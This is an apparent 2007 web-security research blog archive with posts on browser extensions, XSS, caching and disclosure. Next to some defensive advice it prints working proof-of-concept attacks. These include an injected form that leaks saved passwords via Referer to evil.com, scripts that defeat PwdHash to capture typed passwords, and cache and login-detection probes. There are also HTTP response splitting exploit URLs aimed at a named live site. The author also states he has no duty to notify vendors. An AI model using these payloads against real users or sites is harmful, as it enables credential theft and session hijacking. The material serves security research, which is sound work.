Monday, February 26, 2007

stopgetpass.user.js - an interim solution

A couple of days ago I posted a method of breaking the RSCR Fix Mozilla implemented in Firefox. Today, I want to post an interim fix for the issue in the form of a Greasemonkey script:

for (i=0,c=document.forms.length;i<c;i++) {
    if (document.forms[i].method == 'get') {
        var password = false;
        for (l=0,k=document.forms[i].elements.length;l<k;l++) {
            if (document.forms[i].elements[l].type == 'password') {
                password = true;
            }
        }
        if (password == true) {
            document.forms[i].method = "post"
        }
    }
}


Essentially it just loops through all the forms on a page and sets the method on all forms with password fields to post. So while this will stop you from the attack I described, it will most likely break sites, so once a patch comes out of Mozilla (which I honestly hope it will, because otherwise all their efforts on the previous patch will be in vain), this will need to be removed.

Also, since this script is extracting method and type values from the DOM, it doesn't have to worry about case, obfuscation, etc, so it should not be vulnerable to any obfuscation of either the type or the method properties.

I'm sure you all know how to install Greasemonkey scripts,so I'm not going to bother explaining how to here, because for those who don't there's always Google.

P.S. 50th Post! Hurray, I've managed to actually stay interested in something for an extended period of time. I'm sure that some of the posts were completely disinteresting to people, but I hope that some of them weren't.

More Authenticated Redirect Abuse

A while ago I wrote two posts entitled Detecting Logged In Users and More Logged In User Detection via Authenticated Redirects.

Today I want to expand a bit more on how Authenticated redirects can be abused.

I want to talk about how you can abuse authenticated redirects which only redirect to certain domains (i.e. not yours), and not get stopped by extensions such as SafeHistory and SafeCache.

If we can redirect to any resource on a server it is quite reasonable to assume that we can redirect to either an image or a piece of javascript.

First of all, lets say our redirection script that exists on http://target.com/redir.php looks like this: (Ignore the fact that if it was an old version of PHP it would be vulnerable to response splitting, and the fact that parse_url doesn't validate URLs);

<?php

session_start();

if ($_SESSION['logged_in'] == true) {
    if ( is_string($_GET['r']) ) {
        $url_array = parse_url ($_GET['r']);
        if ($url_array['host'] == $_SERVER['SERVER_NAME']) {
            header ("Location: " . $_GET['r']);
            die();
        }
    }
}

header ("Location: http://" . $_SERVER['SERVER_NAME'] . "/index.php");

?>


Knowing that we can redirect to any resource on the server we can create something like the following:

<html>
<body>
<img src="http://target.com/redir.php?r=http://target.com/images/logo.png" onload="alert('logged in');" onerror="alert('not logged in');" />
</body>
</html>


We could also redirect to javascript objects and overwrite the functions it calls,so that we know when it executes, but that's a whole lot more work.

Also, one other thing I failed to mention in either of the two previous posts, is that the technique I described in them can be used in any situation where something is loaded into the history, which includes iframes, popups, etc - but they are of course much less common.

Saturday, February 24, 2007

Fixing IE Content-Type Detection Issues: Output Filtering Instead Of Input Validation

[EDIT](25/02/07): It seems that this method doesn't completely work, so please read the comments to find more info, because otherwise this isn't going to do you any good.

There's been a bit of discussion over a sla.ckers.org about injecting Javascript into uploaded image files, and having IE detect the content type as text/html rather than the content-type sent by the server. For anyone who isn't familiar with the issue I recommend you read the following post: http://www.splitbrain.org/blog/2007-02/12-internet_explorer_facilitates_cross_site_scripting Not because its the first mention of it, but its the best and most technical description I've seen.

Anyway; to take a leaf out of Sylvan von Stuppe's book, I'd like to recommend a way to do (the equivalent of) output filtering, rather than input validation to stop this issue.

First of all, lets take a look at why we would ever do input validation to stop XSS attacks. The only reason we have ever had to do input validation is to stop people inputting Javascript, but allowing them to input html.

In all other situations where we don't need to allow certain html, we can simply encode all output in the appropriate char set, and we're safe.

And there is no reason we would ever need to allow users to upload images which get interpreted as html files, and therefore served as such.

So, having established (at least in my view), that output filtering is the way to go; how would we go about doing this without altering the image?

Well, in this case its easy enough; all we need to do is use a header that IE does respect; the Content-Disposition header. And possibly also a Content-Type header of application/octet-stream or we may not, depending on how paranoid we are, and how much we want to (possibly) break things.

There are several way to do this.

On Apache, the best solution is to use mod_headers to send the header for all files in a particular directory, and move all your uploads there.

Microsoft provides an explanation of how you can achieve the same on IIS here: http://support.microsoft.com/kb/q260519/

You can of course, also set PHP or any other server side language as the handler for all the files in a directory, and then use the header() (or similar) function to send the Content-Disposition header tot he browser.

Of course, this might be annoying if a user does something like right click on an image and click view image, but this is a minor inconvenience IMO.

Breaking Firefox's RCSR Fix

In Firefox 2.0.0.2, the developers have done a lot of good in regards to helping prevent XSS and other attacks against the client; you can read the whole advisory here: http://www.mozilla.org/security/announce/2007/mfsa2007-02.html

And while their fix for the RCSR issue is good, its not perfect.

As everyone (including people commenting on mozilla's bug tracker) noticed, there is no real way to prevent this if an attacker can execute Javascript on the domain, because he can simply inject an iframe which has an src attribute set to the page which the user normally logs in on, and then simply change its contents to get the password.

Anyway; this fix attempts to solve the issue of an attacker being able to abuse the password manager if the attacker can inject html, but not Javascript. And so, that is the constraints within which we need to break the fix.

Lets assume we have a html injection issue in a page called http://site.com/vuln.php in the GET parameter search; i.e. http://site.com/vuln.php?search=<img src=http://evil.com/image.jpg> would inject an image into the page.

What we can then do is inject a form into the page which looks like this:

<form action="http://site.com/vuln.php" method="get">
    <input type="text" name="username" />
    <input type="password" name="password" />
    <input type="hidden" name="search" value="<img src='http://evil.com/log.php' />" />
    <input type="submit" value="Login" />
</form>


Then if we get the user to submit the form, then the referers sent to http://evil.com/log.php will have the username and password in them.

Of course, our form would have to have an input field which is an image which is transparent but covers the whole browser window, which would submit the form for us, or similar so that the form is submitted but that issue has already been solved, and I wanted to keep the example clean.

On Disclosure

Firstly, just so that you understand my bias, my view on this topic is as follows:


  • I don't care how unethical disclosure is; if it interests me, and possibly others I'll post it.

  • I have no responsibility to give a vendor who has written insecure software time to fix their flaws - they've had time ever since they started writing it.

  • I also have no responsibility to contact them about any issues either.

  • I have no need to justify my position to anyone, and it won't change unless I get paid for it to change.



Anyway; Sid wrote a post on blogs.securiteam.com about how an ISP had backdoored its customers routers to make administration easier, entitled Accidental backdoor by ISP, which generated a bit of heat from some people, especially Cd-MaN.

He goes on about how Sid's post was unethical because didn't help anyone by mentioning which ISP it was, and saying which subnet they owned and what the passwords were, other than people who would want to attack the ISP.

Now, arguing on in cd-man's terms, there are people it helps. It helps anyone who wants to do some further investigation of the issue. It helps anyone who has an account with that ISP to secure themselves; I see no reason why it has to be disclosed in such a way that it would reach the majority of affected users, its not our responsibility to fix other people's mistakes; and never should be.

It also helps raise awareness of an issue which hasn't got much (if any) air time before. Because if you read any of the SpeedTouch manuals you will notice that they have a default remote administrator account, which most users never know about. Furthermore I'm willing to bet on the fact that most ISPs who use SpeedTouch routers will all have the same remote admin passwords.

And it really doesn't help anyone to say thing like (http://hype-free.blogspot.com/2007/02/full-disclosure-gone-bad.html)
But this recent post on security team screams of the "I'm 1337, I can use nmap, I rooted 14716 computers" sentiment.

Because all it does is spread the FUD. If cd-man had bothered reading the post carefully he would have noticed that all I did was run an nmap scan to determine how many of the hosts were running telnet in that subnet. I think the number is higher than 14716 though, because my wireless network is dodgy and prone to giving out halfway through something, and considering that that scan took hours (unattended), I wouldn't be surprised if it had missed whole chunks.

Oh and he also says:
How does disclosing this flaw with such detail (like subnet addresses and the ISP name) help anyone? The story would have been just as interesting would he left those details out.

I have no real argument her, but I see nothing interesting in someone posting that some ISP somewhere has used the same remote admin password on all its routers. But that's not exactly something we can argue about, since that's just like arguing which tv show is better.

Tuesday, February 20, 2007

Gotcha!: A PHP Oddity (with contrived security implications)

A while ago, I was look over some code a friend of mine (who doesn't write much PHP) had written, which 'worked', but really shouldn't have.

It looked something like this:

if (strpos ($string, "needle") == "needle") {
    print "Is Valid";
}


And if you know PHP, you'll know that strpos always returns an integer or Boolean false (i.e. it should never return a string), so how the hell could this work?

Well, skipping my usual anecdote; it turns out that PHP casts string to integers when doing comparisons between strings and integers (not the other way around as I would have expected), and so "needle" got cast to an integer, and it was equal to 0. (And since strpos was returning 0 the above code worked).

<Edit> (21/02/07): I realise that there should never be a double dollar vulnerability anywhere in your code, but mistakes are made, this is just what I thought was a curiosity which would interest people; clearly I was wrong. Also, while this uses a double dollar vuln, it is the only way I could come up with to get a string to be compared to an integer (rather than a decimal string) you control.
</Edit>

Now, for the very contrived security issue:

<?php

$authenticated = 0;
session_start();

if (isset($_SESSION['password'])) {
    if ($_SESSION['password'] == "password removed from backup") {
        $authenticated = 1;
    }
} elseif (isset ($_GET['password'])) {
    if ($$_GET['password'] == "password removed from backup") {
        $authenticated = 1;
    }
}

if ($authenticated == 1) {
    print "You Win!";
} else {
    print "You Fail!";
}

?>


You'll see the code above has a double dollar vulnerability; which would be unexploitable in this scenario because the password string is not stored in a variable; but rather is hard coded. But since; at this point, the variable $authenticated is equal to zero, we can have $_GET['password'] equal to "authenticated", and $$_GET['password'] is equal to zero, and the comparison works.

Note: The double dollar vuln is needed rather than just passing 0 to a normal comparison because all variables sent through http are strings.

Note2: It doesn't matter in what order the arguments are typed in the comparison, i.e. the following would also be vulnerable:
if ("password removed from backup" == $$_GET['password']) {

Monday, February 19, 2007

You call that a game? This is a......

Firstly; sorry for the lack of updates, I've really been too busy to come up with anything interesting to write, and haven't found anything particularly interesting to write about.

Now, onto the bad title. I found the following "game" on digg: http://crackquest.ultramuffin.com/index.php and decided to see exactly how effective the sha-1 rainbowtables I had found were.

Now, the first thing I tried was using http://www.shalookup.com/ since you can crack up to 50 hashes at a time (50 because that is the limit per IP). So I ran the list of hashes against shalookup.com (using a proxy for the second 50) and got quite good results; I think that at least 50 (I wasn't counting) of the hashes I cracked came from shalookup.com.

After this I ran the remaining hashes against http://www.hashreverse.com/ and http://md5.rednoize.com/ and was able to crack a further 20 hashes.

I tried running the remaining 30 against http://www.md5encryption.com/, but got no results (which doesn't really say anything since the only ones left were the ones no-one else could get), and I got interrupted while running the hashes against http://hashcrack.905tech.com/cracker.php, which during the time I was away went down, and I don't have an account on http://rainbowcrack.com/ (if anyone does, I'd really appreciate it if you got in contact with me), and http://passcrack.spb.ru/ seems to be down for maintenance.

So while this little anecdote can't testify to the usefulness of any single site (other than shalookup.com), it clearly illustrates that it doesn't matter what hashing algorithm you use if you do not salt the data first, and your users use poor passwords. But we already knew that, so *shrug*.

Tuesday, February 13, 2007

Attacking Aspect Security's PDF UXSS Filter

While this is not really much of an issue any more because Adobe have released and update and there isn't really much to say, I'd like to revisit it for a momment.

There were a lot of people (myself included) who had considered the PDF UXSS issue unsolvable at the server-side level; how wrong we were: http://www.owasp.org/index.php/PDF_Attack_Filter_for_Java_EE

I have no real analysis of it because, as far as I can tell, its bullet proof. or at least it would be if browser security didn't have fist-size holes in it. From a black box perspective where there is no information leakage; that fix is great.

But sadly, there are ways to simply obtain the data. Using an Anti-DNS Pinning attack, it should not be a problem to simply send a request to that IP with the appropriate Host header, etc, and then parse out the link and simply redirect the user. I'm not going to bother providing any code, because there's really nothing new here, just another misfortune.

So a very good idea, is practically useless, simply because the rest of our security model is shot to bits.

A Better Web Cache Timing Attack

I've been thinking on whether I should bother writing an actual paper on this or not, but when I found that Princeton had already written a pretty decent paper on Web Cache timing attacks back in 2000, which you can find here: http://www.cs.princeton.edu/sip/pub/webtiming.pdf I decided against it.

If you read the paper you will see that the attack relies on the user of two images to determine if the images are cached by determining if there is a dramatic change in loading times between getting the timing for one image, then loading a page which caches both images, and then getting the timing for the second image. If there is a significant difference, then then the first image had not been cached, and they had therefore not visited the page; whereas if there was no significant difference then the image was already cached, and therefore the page had been viewed before.

Now, this suffers from the fact that you do actually need two images which are ONLY displayed together, because otherwise your results will be erroneous, and not only that; but it requires that the images are approximately the same size so that your inferences about cache state are accurate.

A much better solution is to be able to determine the time it takes to retrieve a cached and non-cached version of an image by supplying request parameters, e.g. http://www.example.com/image?test=123456

The first thing we do is generate a random request string, and make a request for that image, and we now have the approximate time it should take to get the image when it is not cached, and we then make a second request to see how long the image takes to load when it is cached, and by generating a large amount of query strings to test we can get more accurate amounts.

We then make a request for the image without any request parameters and see which averaged value it is closer to, and then determine cache state.

This benefits from the fact that not only does there only need to be one image, and we can therefore find a page with a large photo or similar to give us a greater margin for error, but we also do not need to find a page with two images of equal size because we will always be making requests for the same size image.

Sadly not quite as effective as the attack against the SafeCache extension, but that's why its a timing attack I guess, :)

Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially it extends the browser same origin policy to the browser cache to defend against cache timing attacks. You can find more info about it here: http://www.safecache.com/

Now while I have not looked at the source code to the extension, I have devised a method for not only being able to perform timing attacks, but to be able to directly determine whether or not the objects you are trying to find info about are in the cache or not.

It seems that if you create an iframe element where the src attribute points to the resource whose cache state you want to query, then the onload event will fire only if the item is not in any cache.

To test this either login to Gmail, or go to http://mail.google.com/mail/help/images/logo.gif and then create a page like the following:

<html>
<body>
<script>
function loaded() {
var time = new Date();
var t2 = time.getTime();
alert(t2- t1);
}
var time = new Date();
var t1 = time.getTime();
</script>
<iframe src="http://mail.google.com/mail/help/images/logo.gif" onload="loaded()">
</iframe>
</body>
</html>



And you will notice that the onload element does not fire. Then if you press Ctrl+Shift+Del and delete the cache, then visit the html page you just created again, the onload event will fire.

If you refresh the page, the onload event will not fire a second time because the image is already in the cache.

So while it stops standard cache timing attacks, it does not stop attacks against itself.

Anatomy of a Worm by Kyran

From http://kyran.wordpress.com/2007/02/10/paper-anatomy-of-a-worm/:
It’s about the worm I wrote targeting GaiaOnline.com, aptly named ”gaiaworm”. This is the third version of the worm and the first time I’ve ever really written a paper.


Its an interesting paper that details what he has coined a "Pseudo-Reflective" Worm, in that while it uses a reflected XSS vector, it uses a persistent on(in?)-site spreading mechanism - in this case the PM system.

Solving Password Brute Force And Lockout Issues

Locking users out of sites by exhausting a limited number of login attempts has always been a pet peeve of mine (not only because you can sometimes forget which particular password you used; but also because it becomes quite easy to perform a DoS attack against someone's account simply by locking them out via failed login attempts) that I thought most websites had done away with, not so Sudo Labs it seems. Now, I'm not about to take responsibility for this since it isn't our code base, and we didn't even think that it would be set up this way, but when I was talking to Kyran I found out that (much to our chagrin), he had gotten locked out.

Which got me thinking; why can't we have an over-ride code to allow people to login even when their account is being attacked. As I see it there's no reason we can't, we can even re-use existing code to achieve it.

These days when you want to sign up for most sites you get sent an email with an activation code/link which you have to use so that your account is activated, and we know you own the account.

Now, if we were to use the current lockout system, but give users an option to request a special login code, we would be able to leave the normal functionality working most of the time (except for when the user's account is being DoS-ed), but when they are being attacked they would not be locked out because they can easily just request a login code, and use it to bypass the lockout. Of course, this cannot be used by email vendors, who are already the crux of most of our identification, so its not much of an extra burden.

Bookmarklets are NOT secure

Jungsonn wrote a post entitled "Defeating Phishers" where he wrote about how one could distribute risk across two servers, and essentially have one site where XSS vulnerabilities are unimportant, and one which would need to be audited heavily. He also recommended using Bookmarklets because "Bookmarklets are actually pretty secure things, no software or website can access them.".

Personally I disagree with both those statements. Firstly, if you find an XSS hole in the main domain, you can easily make the page say that they've changed their practices, sure it would be a little odd, but the amount of user education required for this attack to be impractical would be enough to solve the whole phishing issue, not just this one.

But more importantly I want to debunk the myth that Bookmarklets are secure. Leaving aside the fact that trojans and similar can easily alter them because they have access to the file system, they are still insecure; they are as insecure as the page they are clicked on is untrustworthy.

For example, lets take the Bookmarklet Jungsonn posted:
javascript:QX=document.getSelection();if(!QX){void(QX=prompt('Type your firstname',''))};if(QX)document.location='https://myonlinebank.com'

It would seem fairly secure, except for the fact that with the very allowing Javascript engines, we can stop this from working, here's how:
<script>
function changeHandler(x, y, z) {
if (z == 'https://myonlinebank.com') {
return 'https://myonlinebank.com.us';
} else {
return z;
}
}

document.watch('location', changeHandler);
</script>


If the bookmarklet is clicked on a page with that on it - say a phishing page at http://myonlinebank.com.us or a legitimate page on the http://onlinebank.com domain if it has an XSS hole in it, then we can easily send the user to a phishing page, even though the value is hard coded in the bookmarklet.

Of course, the bookmarklet can try to detect and remove such things, but its a technological battle that will be fought on a bookmarklet by bookmarklet basis; which is essentially where security generally fails - custom code. Of course the other scenario is that we find a secure method of redirecting users, but even if we do, we're not going to be able to get everyone to use it; so I'd rather not recommend bookmarklets as security; just tell users to create a simple bookmark to the site.

Or we could try to educate users to only click on the bookmarklet from a blank page, but thats another area where security generally fails - user education.

Friday, February 09, 2007

XSSed.com - XSS Archive w/ Mirror

One thing that I've thought web app sec was missing that network sec had was a defacement/attack archive w/ mirror, especially after Acunetix decided to pretend that the flaws that had been found and posted on sla.ckers.org had never existed, something like Zone-h, but for XSS exploits.

Well, today I found a site called XSSed.com which contains an XSS attack archive, with a mirror, which greatly resembles zone-h, but that can only be good since no-one has to figure out a new interface.

Personally I think we should give them our support, because without any way to verify vulnerability claims vendors will still be able to sweep things under the rug, and lie their way though everything. And an unbiased 3rd party is probably a great way to do so.

Sunday, February 04, 2007

This Week in Sec

Excuse the bad pun of a title, but I couldn't come up with anything better. Anyway, as with my last posting of links, its not exactly a week, its probably closer to "the interesting links I've found since I lasted posted a post of links". So here goes:

.aware alpha zine
The people over at awarenetwork.org have released an ezine, it has nothing to do with web apps, but its still quite good. To quote the front page:
Hello and welcome to the first .aware eZine ever to exist on planet
earth. Basically, with all the h0no wannabes out there and phrack down,
I thought there ought to be a little bit more actual infotainment spread
into cyperspace. This way, maybe not all of us will be driven into
criminal insanity by paranoid hallucinations.


Enjoy the zine.

PS: We're sorry for causing all that cancer.




CAPTCHA Recognition via Averaging
This article describes how certain types of captchas (such as the ones used by a German online-banking site) can be automatically recognized using software. The attack does not recognize one particular captcha itself but exploits a design error allowing to average multiple captchas containing the same information.


This was submitted to bugtraq, and soyou can find the bit of discussion that went on about that here: http://seclists.org/bugtraq/2007/Jan/0648.html (Note; this isn't just the single post, there are replies) and because it got separated between the two months, here: http://seclists.org/bugtraq/2007/Feb/0000.html



Vista Speech Command Exposes Remote Exploit
Essentially some people found out that Vista doesn't try and do any cancelation of the audio which comes from the speakers to the microphone, and so any commands your computer plays through the speakers will be picked up, and if you have the voice commands activated, will execute.



I didn't break it!
Matt Blaze posted a very good entry about how (crypto) researchers are often described as having cracked codes, and how this taints research. I think this also applies to security research just as much, except for the fact that generally most people say security researchers "broke" something rather than they "cracked" something. He also has another interesting post entitled James Randi owes me a million dollars which I think people should also read.



And in case you somehow managed to miss it:
Sudo Labs is up!
Sudo Labs is an attempt to create an R&D oriented forum where people can come to discuss any ideas they have about security in an environment which focuses on new ideas and techniques, etc rather than explaining old thoughts. Having said that those who aren't experts are also welcomed, just asked to contribute rather than to clog the board with questions about known topics, there are many other boards which will teach you about security.



So that about wraps it up for interesting things I've found over the past week in regards to security, hopefully next time I'll have a better title, but I somehow doubt it.

Saturday, February 03, 2007

Samy Sued and Sentanced

Well, today we've found out that the creater of the MySpace Samy worm has been sued by MySpace and sentanced: http://www.scmagazine.com.au/news/45262,myspace-superworm-creator-sentenced-to-probation-community-service.aspx

I'm honestly lost for words, that comes as quite a shock to me.

Now clearly he has done something wrong (and now it seems - illegal), but I don't think anyone expected this. Especially considering that while it did spread, it was completely non-malicious.

For the moment I'm safe since I've never attacked MySpace, but frankly, I'm just worried that they're going to come after people who have disclosed vulnerabilities in MySpace next.

Friday, February 02, 2007

Attacking the PwdHash Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all the content here:




A while ago I saw an interesting paper/implementation of a way to hash and salt user passwords by domain, so that (I assume) phishing attacks would not be able to steal users' passwords because they are salted with the phishing domain rather than the targeted domain. You can find more info here: https://www.pwdhash.com/

If you read their paper, and the comments in the extension you'll see that they've got pretty much anything you can think of covered. One of the things they haven't been able to stop has been Flash based sniffers, because Javascript extensions don't have any control over 3rd party plugins.

But I have come up with a way to circumvent certain protections and possibly another attack.

To protect against context switching attacks when a user presses the @@ combination or the F2 key into a password field the context cannot be changed without alerting the user if there are less than 5 additional characters.

This is decent protection since you cannot steal the first 5 letters of a user's password, and since user passwords aren't particularly long those first 5 characters are vitally important.

But the extension developers made a few fatal mistakes - they allow the page to receive events of a user pressing the @ key (they do not allow the page to get the F2 key), and they also check how many characters there are in the text box by checking the DOM, and since we are not restricted from changing the DOM we can easily change the contents of the password box.

So what we can do is; detect two presses of the @ key, quickly change the value of the password box to testing or some similar string which is more than 5 chars long, set the focus to another element, and then change the value of the password box to two @ signs, and put the user back in place. you get a little flicker, but most users will discount that, anyway; here's an example:

<html>
<body>
<script language="javascript">

var text = document.createElement('div');
document.body.appendChild(text);
var last = null;

document.onkeypress = function (e) {

var key = String.fromCharCode(e.charCode);
if (last == '@' && key == '@') {
var pb = document.getElementById("pass");
pb.value = '@@testing';
window.setTimeout("context_switch ();", 1);
}
text.innerHTML = text.innerHTML + key;
last = key;
}

function context_switch () {
var pb = document.getElementById("pass");
var tb = document.getElementById("text");
tb.focus();
pb.focus();
pb.value = '@@';
}
</script>

<form>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden>
</form>
</body>
</html>


Another thing Firefox allows you to do is create events, which can be sent to the DOM, and for some reason they do not go through extensions, this is a sort of double edged sword because while we cannot simulate a user typing to an extension, the extension is not aware of us sending events to the DOM.

And since the extension developers are sort of using the password box to store the password (the password box contains @@ABCDEFGH...etc which get mapped to the text you entered by the extension when they're computing the hash) we can insert text into the password box and have it included in the hash, and since we can inject the letters ABCD, etc, we can conduct an attack where we know that say each letter is repeated 3 times (by detecting keyboard events and then sending two of those events to the textbox again), this isn't a real attack atm since I haven't looked at the hashing algorithm, but it should make any cryptanalysis easier if we can repeat any number of letters any number of times.

Also, if we think we can get the user to keep on entering their password over and over again, we can just replace the textbox content with say @@AAAAA or @@BBBBB or @@CCCCC or similar so we can get a hash of a single character repeated, and then have a simple 256 value lookup table.




Ok, I figured out a way to defeat the fact that we can't detect the F2 key being pressed.

It does have some false positives, but this is just to show that an attack is still possible.

Anyway, what we do is detect when we get sent an A, we then check that the length of the text in the password box is > 0 and if it is, we send 4 As to the password box, and swap the context. And record some data, and all we need is a 256 value lookup table. Anyway, here's the PoC:

<html>
<body>
<script language="javascript">

var text = document.createElement('div');
document.body.appendChild(text);

var enc0 = null;
var enc1 = null;

document.onkeypress = function (e) {

var key = String.fromCharCode(e.charCode);
if (key == 'A') {
var pb = document.getElementById("pass");
window.setTimeout ("test_n_send();", 1);
}
text.innerHTML = text.innerHTML + key;
}

function test_n_send() {
var pb = document.getElementById("pass");
var tb = document.getElementById("text");
if (pb.value.length > 0) {
send4A();
enc0 = pb.value;
tb.focus();
enc1 = pb.value;
pb.focus();

var enc0b = document.getElementById("enc0");
enc0b.value = enc0;

var enc1b = document.getElementById("enc1");
enc1b.value = enc1;

}
}

function send4A() {

var i;

for (i=0;i<4;i++) {
var evt = document.createEvent("KeyboardEvent");
evt.initKeyEvent(
"keypress", // in DOMString typeArg,
false, // in boolean canBubbleArg,
false, // in boolean cancelableArg,
null, // in nsIDOMAbstractView viewArg, Specifies UIEvent.view. This value may be null.
false, // in boolean ctrlKeyArg,
false, // in boolean altKeyArg,
false, // in boolean shiftKeyArg,
false, // in boolean metaKeyArg,
0, // in unsigned long keyCodeArg,
65); // in unsigned long charCodeArg);

var pb = document.getElementById("pass");
pb.dispatchEvent(evt);
}
}

</script>

<form>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden><br />
<input id=enc0><br />
<input id=enc1><br />
</form>
</body>
</html>

Thursday, February 01, 2007

HTTP Response Splitting Attacks Without Proxies

I've had this paper sitting around collecting dust for so long, but I've been keeping it for a reason, me and a friend (troopa) are trying to start a hacker/infosec community focused around Research and Development of ideas and attacks, rather than simply a teaching and learning ground for people, because there are plenty of those already in existence, but very few places where people come together to collaborate on new ideas, and so I present to you Sudo Labs.

I initially posted the full paper on Sudo Labs here: http://sudolabs.com/forum/viewtopic.php?t=3

But now that I've directed a bit of traffic there (that really didn't help), I'm posting it here as well:

[EDIT (14/02/07)]: I've been informed, that my introduction was completely wrong and may have mislead people, and so I've replaced it.

HTTP Response Splitting Attacks Without Proxies


By kuza55
of Sudo labs

Contents:

1.0 Introduction
2.0 The Attack
    2.1 Theory
    2.2 Browser Inconsistencies
    2.3 Working Exploits
3.0 Implementation Notes
4.0 Conclusion

1.0 Introduction

At the moment, the only know technique (AFAIK - Correct me if I'm wrong) for attacking the browser cache to alter the cache for pages other than the one vulnerable to HTTP Response Splitting is the One proposed by Amit Klein on page 19-21 of this paper: http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

It utilises the fact that IE operates on only 4 connections to request pages from a single server.

This paper will illustrate something similar.

2.0 The Attack

As many people before me have discovered; if you can force the browser to make a request for a page on the connection you control, you can replace the contents of the page.

The problem has been to force the browser to do just that.

But what if we ask nicely?

2.1 Theory

If in our doctored response we redirect the user to another page on our site and we send the browser the "Keep-Alive: timeout=300" and "Connection: Keep-Alive" headers the browser does exactly what we asked it and sends the request on that connection (except Opera 9, which doesn't want to - Opera 8 does).

The next thing we need to do is to send the browser a "Content-Length: 0" header so that it thinks its received everything its going to from its first request and sends the second request straight away.

We then send the browser a couple of new lines, and then lots of extraneous spaces and then a new line as well.

This works much like a NOP sled in Buffer Overflow attack, because this way we can prepare a landing zone for the browser which it will just ignore before reading the actual response, this gives us greater flexibility in regards to browser inconsistencies and network latency issues.

2.2 Browser Inconsistencies



Sadly not all the browsers react the same way, and so not everything can be done easily, here's a little chart at what I've been able to produce in various browsers so far:

1 = Second request made on the same connection.
2 = Second Response can be injected into
3 = Headers can be injected into the second response
4 = Content-Length Header is strictly obeyed

+ = yes
~ = Sort of
- = No
x = N/A

-----------------
|Browser|1|2|3|4|
-----------------
|Opera 8|+|+|+|+|
-----------------
|IE 6 |+|+|+|~|
-----------------
|Firefox|+|+|-|x|
-----------------
|Opera 9|-|-|-|x|
-----------------

So essentially I've only really been able to exploit the attack's full potential under IE 6 and Opera 8. So getting this to work under Firefox (and possibly Opera 9) is for people with more experience in how browser work with the network.

The issue with Internet Explorer is that it reads things in 1024 byte blocks, and so any Content-Length headers which to not fall on that boundary will be rounded up to the nearest kilobyte, but that's not much of an issue.

Internet Explorer also has a 2047 byte limitation on query strings, so my original design of using new lines doesn't work because they get encoded in the query string to 3 times their length (6 bytes - %0d%0a - instead of two), and so spaces had to be used as the white spaces to be ignored.

For some reason I can't seem to get Firefox to use the headers I provide, but you can easily inject into the top of the page, and simply make the browser not render the rest by using an unclosed div tag with a display: none style attribute.

Opera 9 (as I mentioned earlier) though, just doesn't want to make the request on the same socket, and so I haven't been able to get this attack to work.

2.3 Working Exploits



Now, onto the interesting part - Working Exploits.

This *works* (To the extent explained above) in both IE and Firefox:

http://www.dataplace.org/redir.html?url=index.html%0d%0aKeep-Alive: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        %0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>


But it doesn't work on Opera 8, Opera 8 works the way you would sort of expect a browser to work, in that it begins reading the stream from where it left off, and so we don't need to provide much whitespace:

http://www.dataplace.org/redir.html?url=index.html%0d%0aKeep-Alive: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>



3.0 Implementation Notes



If anyone wants to use this to use this to perform browser cache poisoning attacks (either to hide the suspicious URL or something similar) then the best way would probably be to check if the URL you are poisoning sends an Etag header and if so replicate that header so that when the browser sends a If-Modified-Since header, then the web server will honestly say it hasn't, if the resource you want to poison is a dynamic resource, you'll have to rely on the Cache-Control and Date headers alone (though these should be used along with the Etag header).


4.0 Conclusion



So as we can see, we don't need a proxy to implement interesting protocol oriented HTTP Response Splitting attacks, and hopefully someone with a deeper understanding of browsers than me can figure out why the above attacks aren't working in Firefox and Opera 9.